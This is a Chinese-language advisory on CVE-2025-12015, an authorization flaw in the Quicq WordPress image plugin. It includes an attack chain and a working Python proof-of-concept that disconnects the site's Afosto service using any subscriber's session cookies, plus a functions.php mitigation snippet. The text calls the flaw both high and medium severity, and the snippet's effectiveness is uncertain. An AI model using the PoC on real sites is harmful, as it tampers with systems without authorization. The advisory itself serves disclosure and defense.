CVE-2025-12015 WordPress Quicq插件AJAX权限绕过漏洞

漏洞信息

漏洞编号

CVE-2025-12015

漏洞类型

权限绕过/授权缺失

CVSS评分

4.3 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Convert WebP & AVIF | Quicq | Best image optimizer and compression plugin for WordPress

漏洞概述

CVE-2025-12015是WordPress插件Quicq（用于WebP和AVIF图像转换及压缩优化的插件）中的一个高危安全漏洞。该漏洞存在于插件的AJAX处理端点'wp_ajax_wpqai_disconnect_quicq_afosto'中，由于缺少适当的权限验证检查，导致任何已认证用户（即使是最低权限的订阅者角色）都能执行断开Afosto连接的敏感操作。攻击者可利用此漏洞在未经授权的情况下修改系统配置，影响网站的图像优化功能正常运行。虽然CVSS评分为4.3（中危），但该漏洞降低了攻击门槛，使得内部威胁或被入侵的低权限账户也能对网站造成破坏性影响。

技术细节

该漏洞属于OWASP Top 10中的'失效的访问控制'类别。具体来说，WordPress的AJAX处理机制要求开发者手动检查当前用户权限，但Quicq插件在注册wp_ajax_wpqai_disconnect_quicq_afosto端点时，未调用current_user_can()或类似权限检查函数。攻击者只需构造一个POST请求到wp-admin/admin-ajax.php端点，设置action参数为wpqai_disconnect_quicq_afosto，即可触发断开Afosto连接的逻辑。由于WordPress默认允许所有已登录用户（包括Subscriber角色）访问AJAX端点，攻击者可以利用任何有效的用户凭证发起攻击。成功利用后，网站的图像优化服务连接将被断开，导致依赖该功能的页面加载变慢或图像显示异常。

攻击链分析

STEP 1

步骤1

攻击者获取目标WordPress网站的任意有效用户账户（Subscriber级别或更高），或通过其他方式（如钓鱼、凭证泄露）获得已认证会话

STEP 2

步骤2

攻击者构造恶意HTTP POST请求，访问/wp-admin/admin-ajax.php端点，设置action参数为'wpqai_disconnect_quicq_afosto'

STEP 3

步骤3

由于插件未验证current_user_can()权限，请求被服务器接受并执行断开Afosto连接的逻辑

STEP 4

步骤4

Afosto服务连接被断开，网站的WebP/AVIF图像转换和压缩功能失效，用户体验下降

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import sys

# CVE-2025-12015 PoC - Quicq Plugin AJAX Authorization Bypass
# Target: WordPress site with Quicq plugin <= 2.0.0
# Effect: Disconnect Afosto service without authorization

target_url = sys.argv[1] if len(sys.argv) > 1 else 'http://target-wordpress-site.com'

# Valid WordPress authentication required (subscriber-level or higher)
# Replace with actual WordPress auth cookie or use XML-RPC authentication
cookies = {
    'wordpress_test_cookie': 'WP+Cookie+check',
    # Add valid authentication cookie here
    # 'wordpress_logged_in_xxx': 'user_token_here'
}

# AJAX endpoint for disconnecting Afosto connection
ajax_endpoint = f'{target_url}/wp-admin/admin-ajax.php'

# Construct the malicious request
data = {
    'action': 'wpqai_disconnect_quicq_afosto',
    # Additional parameters may be required depending on plugin version
}

print(f'[*] Sending request to: {ajax_endpoint}')
print(f'[*] Action: wpqai_disconnect_quicq_afosto')

try:
    response = requests.post(ajax_endpoint, data=data, cookies=cookies, timeout=10)
    print(f'[+] Response Status: {response.status_code}')
    print(f'[+] Response Body: {response.text}')
    
    if response.status_code == 200:
        print('[!] Request completed - verify Afosto disconnection')
    else:
        print('[-] Unexpected response')
except requests.exceptions.RequestException as e:
    print(f'[-] Error: {e}')

# Note: This PoC requires a valid authenticated session.
# Use wp-login.php to obtain valid cookies before running this PoC.

影响范围

Quicq WordPress Plugin <= 2.0.0

防御指南

临时缓解措施

如果无法立即升级插件，可通过在主题的functions.php中添加自定义权限检查来临时缓解：add_action('wp_ajax_wpqai_disconnect_quicq_afosto', function() { if (!current_user_can('manage_options')) { wp_die('Unauthorized'); } }); 同时考虑暂时禁用Afosto集成功能，等待官方修复版本发布。